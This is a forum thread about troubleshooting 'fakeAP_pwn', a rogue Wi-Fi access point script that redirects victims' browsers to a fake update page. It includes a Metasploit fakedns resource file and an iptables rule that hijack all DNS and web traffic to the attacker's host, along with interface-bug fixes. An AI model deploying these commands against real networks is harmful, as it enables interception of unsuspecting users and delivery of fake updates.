I have the same problem with the mobile internet - ppp0 interface. Please help.
Without an internet connection the client (victim) can connect to the AP without any problems - gets an IP address etc. - but the browser does not get redirected to the update page. Enter 10.0.0.1 in the browser and it displays the update page. Does this mean that I need a DNS server running to translate Google to 10.0.0.1? Any ideas or pointers please.
Non Transparent AP
When running without a connection to eth0 (i.e. no internet) the script runs until the client's browser tries to connect to wsearch.net and then "server not found".
Enter any IP address in the browser (any numeric) and then it gets directed to our fake update page OK.
I have tried - iptables -L -t nat - with and without eth0 connected and results as follows
========= differences =============
Not Working (no eth0 connection )
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
DNAT tcp -- anywhere anywhere tcp dpt:www to:10.0.0.1
ACCEPT tcp -- anywhere anywhere tcp dpt:domain
Working (eth0 connected )
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
DNAT udp -- anywhere anywhere to:192.168.1.250
DNAT tcp -- anywhere anywhere tcp dpt:www to:10.0.0.1
ACCEPT tcp -- anywhere anywhere tcp dpt:domain
I guess I need to change my iptables to get this working. (udp 53 ?? )
Any ideas or pointers please
for non-transparent see if this works
echo "use auxiliary/server/fakedns" >> /tmp/fakedns_metasploit.rc
echo "set INTERFACE at0" >> /tmp/fakedns_metasploit.rc
echo "set SRVHOST 10.0.0.1" >> /tmp/fakedns_metasploit.rc
echo "set SRVPORT 53" >> /tmp/fakedns_metasploit.rc
echo "set TARGETHOST 10.0.0.1" >> /tmp/fakedns_metasploit.rc
echo "run" >> /tmp/fakedns_metasploit.rc
$xterm -geometry 75x15+10+215 -T "fakeAP_pwn v$version - Metasploit" -e "$dir_to_metasploit/msfconsole -r /tmp/fakedns_metasploit.rc" &
iptables -t nat -A PREROUTING -i at0 -j REDIRECT # Blackhole: redirect everything to us
v0.2.4
+ Added arguments
+ Checks for superuser
+ Checks interfaces/paths/files exists
+ Improved transparent mode (Thanks joker5bb)
> General code improvements
> Updated the help message
It's not working for me. When I run the script it says
The monitor interface mon0 , inst correct.
I tried this with the following 2 cards
Atheros 9825 and Realtek 8187
I tried to set the cards in monitor mode with the airmon-ng and with the iwconfig.
Monitor mode on both cards works and both are injection capable.
But it isn't working. Does someone know a solution for this problem or have any ideas?
I removed the space at the end of line 122 and it fixed the problem. Example:
"$monitorInterface " to "$monitorInterface"
I believe quotations in bash give an exact response back to the system, basically giving that space at the end as an additional character, therefore not detecting the grep correctly and defaulting to an error.
Worked for me w/ an RTL8187 card, good luck.
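The trailing-space failure described in the post above, as an added example that is not part of the original thread or of the fakeAP_pwn script. Line 122 is not shown on this page, so the shape of the check, the function names and the interface list are assumptions made for illustration.

```shell
#!/bin/sh
# Hypothetical reconstruction of an "interface exists" check; not the script's code.
# Constructed sample: one interface name per line.
IFACE_LIST='lo
eth0
wlan0
mon0'

# Fragile check: the space before the closing quote is part of the pattern,
# so grep looks for the line "mon0 " and the real line "mon0" never matches.
iface_known_fragile() {
    monitorInterface=$1
    printf '%s\n' "$IFACE_LIST" | grep -Fxq -- "$monitorInterface "
}

# Fixed check: quote exactly the variable, and trim whitespace that may arrive
# with the argument itself (config file, copy/paste).
#   -F  treat the name as a literal string, not a regex ("mon." must not match)
#   -x  the whole line must match ("mon" must not match "mon0")
#   --  a name starting with "-" is not parsed as an option
iface_known() {
    name=$(printf '%s\n' "$1" | sed 's/^[[:space:]]*//; s/[[:space:]]*$//')
    [ -n "$name" ] || return 1
    printf '%s\n' "$IFACE_LIST" | grep -Fxq -- "$name"
}

# Show both checks side by side on a few constructed inputs.
for candidate in "mon0" "mon0 " "mon" "mon."; do
    if iface_known_fragile "$candidate"; then fragile=match; else fragile=miss; fi
    if iface_known "$candidate"; then fixed=match; else fixed=miss; fi
    printf '[%s] fragile=%s fixed=%s\n' "$candidate" "$fragile" "$fixed"
done
```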
Non Transparent
Thanks joker5bb, the DNS metasploit code you suggested worked fine in my own script that I have been playing with to make a non-transparent AP.
I will try it in FakeAP_pwn script soon.
Was going to try v0.2.4 but it won't run with interface problems. Just seen the fix posted above. Will try when I have time.
Thanks again.
Well, I have made many changes and fixes,
also improved the fakedns as well,
so just wait for v0.3
I have just tested the non-transparent mode in windows and linux
and here are the results
any domain - ex google.com redirects to our page
any IP -ex 1.1.1.1 redirects to our page
but going to something like this:
http://www.backtrack-linux.org/forums - fails to work properly, need fix in apache2
I'm going to fix the starting script for apache2 as well
*edit*
apache2 starting script also fixed,